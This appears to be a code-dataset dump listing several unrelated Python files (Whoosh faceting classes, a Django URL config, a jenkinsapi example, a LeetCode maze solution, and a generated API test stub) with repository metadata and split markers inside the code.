You can use the offset to get absolute index docnums by adding the
offset to segment-relative docnums.
"""
pass
def key_for(self, matcher, segment_docnum):
"""Returns a key for the current match.
:param matcher: a :class:`whoosh.matching.Matcher` object. If
``self.needs_current`` is ``False``, DO NOT use this object,
since it may be inconsistent. Use the given ``segment_docnum``
instead.
:param segment_docnum: the segment-relative document number of the
current match.
"""
# Backwards compatibility
if hasattr(self, "key_for_id"):
return self.key_for_id(segment_docnum)
elif hasattr(self, "key_for_matcher"):
return self.key_for_matcher(matcher)
raise NotImplementedError(self.__class__)
def keys_for(self, matcher, segment_docnum):
"""Yields a series of keys for the current match.
This method will be called instead of ``key_for`` if
``self.allow_overlap`` is ``True``.
:param matcher: a :class:`whoosh.matching.Matcher` object. If
``self.needs_current`` is ``False``, DO NOT use this object,
since it may be inconsistent. Use the given ``segment_docnum``
instead.
:param segment_docnum: the segment-relative document number of the
current match.
"""
# Backwards compatibility
if hasattr(self, "keys_for_id"):
return self.keys_for_id(segment_docnum)
raise NotImplementedError(self.__class__)
def key_to_name(self, key):
"""Returns a representation of the key to be used as a dictionary key
in faceting. For example, the sorting key for date fields is a large
integer; this method translates it into a ``datetime`` object to make
the groupings clearer.
"""
return key
# General field facet
class FieldFacet(FacetType):
"""Sorts/facets by the contents of a field.
For example, to sort by the contents of the "path" field in reverse order,
and facet by the contents of the "tag" field::
paths = FieldFacet("path", reverse=True)
tags = FieldFacet("tag")
results = searcher.search(myquery, sortedby=paths, groupedby=tags)
This facet returns different categorizers based on the field type.
"""
def __init__(self, fieldname, reverse=False, allow_overlap=False,
maptype=None):
"""
:param fieldname: the name of the field to sort/facet on.
:param reverse: if True, when sorting, reverse the sort order of this
facet.
:param allow_overlap: if True, when grouping, allow documents to appear
in multiple groups when they have multiple terms in the field.
"""
self.fieldname = fieldname
self.reverse = reverse
self.allow_overlap = allow_overlap
self.maptype = maptype
def default_name(self):
return self.fieldname
def categorizer(self, global_searcher):
# The searcher we're passed here may wrap a multireader, but the
# actual key functions will always be called per-segment following a
# Categorizer.set_searcher method call
fieldname = self.fieldname
fieldobj = global_searcher.schema[fieldname]
# If we're grouping with allow_overlap=True, all we can use is
# OverlappingCategorizer
if self.allow_overlap:
return OverlappingCategorizer(global_searcher, fieldname)
if global_searcher.reader().has_column(fieldname):
coltype = fieldobj.column_typ |
aabdulwahed/wms | app/api/urls.py | Python | apache-2.0 | 161 | 0.006211 | from django.conf.urls import include, url
from .views import UpdateStatus
urlpatte | rns = [
url(r'^update/$', UpdateStatus.as_v | iew(), name='update status'),
] |
117111302/jenkinsapi | examples/how_to/query_a_build.py | Python | mit | 893 | 0 | from __future__ import print_function
from jenkinsapi.view import View
from jenkinsapi.jenkins import Jenkins
J = Jenkins('http://localhost:8080')
print(J.items())
j = J['foo']
j = J.get_job("foo")
b = j.get_last_build()
print(b)
mjn = b.get_master_job_name()
print(mjn)
EMPTY_JOB_CONFIG = '''\
<?xml version='1.0' encoding='UTF-8'?>
<project>
<actions/>
<description></description>
<keepDependencies>false</keepDependencies>
<properties/>
<scm class="hudson.scm.NullSCM"/>
<canRoam>true</canRo | am>
<disabled>false</disabled>
<blockBuildWhenDownstreamBuilding>false</blockBuildWhenDownstreamBuilding>
<blockBuildWhenUpstreamBuilding>false</blockBuildWhenUpstreamBuilding>
<triggers class="vector"/>
<concurrentBuild>false</concurrentBuild>
<builders/>
<publishers/>
<buildWrappers/ | >
</project>
'''
new_job = J.create_job(name='foo_job', config=EMPTY_JOB_CONFIG)
|
yiwen-luo/LeetCode | Python/the-maze-ii.py | Python | mit | 1,267 | 0.003946 | # Time: O(max(r, c) * wlogw)
# Space: O(w)
class Solution(object):
def shortestDistance(self, maze, start, destination):
"""
:type maze: List[List[int]]
:type start: List[int]
:type destination: List[int]
:rtype: int
"""
start, destination = | tuple(start), tuple(destination)
def neighbors(maze, node):
for | dir in [(-1, 0), (0, 1), (0, -1), (1, 0)]:
cur_node, dist = list(node), 0
while 0 <= cur_node[0]+dir[0] < len(maze) and \
0 <= cur_node[1]+dir[1] < len(maze[0]) and \
not maze[cur_node[0]+dir[0]][cur_node[1]+dir[1]]:
cur_node[0] += dir[0]
cur_node[1] += dir[1]
dist += 1
yield dist, tuple(cur_node)
heap = [(0, start)]
visited = set()
while heap:
dist, node = heapq.heappop(heap)
if node in visited: continue
if node == destination:
return dist
visited.add(node)
for neighbor_dist, neighbor in neighbors(maze, node):
heapq.heappush(heap, (dist+neighbor_dist, neighbor))
return -1
|
ltowarek/budget-supervisor | third_party/saltedge/test/test_currencies_api.py | Python | mit | 831 | 0 | # coding: utf-8
"""
Salt Edge Account Information API
API Reference for services # noqa: E501
OpenAPI spec version: 5.0.0
Contact: su | pport@saltedge.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.api.currencies_api import CurrenciesApi # noqa: E501
from swagger_client.rest import ApiException
class TestCurrenciesApi(unittest.TestCase):
"""CurrenciesApi unit test stubs"""
def setUp(self):
self.api = CurrenciesApi() # noqa: E501
def tearDown(self):
pass
def test_currencies_ | get(self):
"""Test case for currencies_get
List of currencies # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.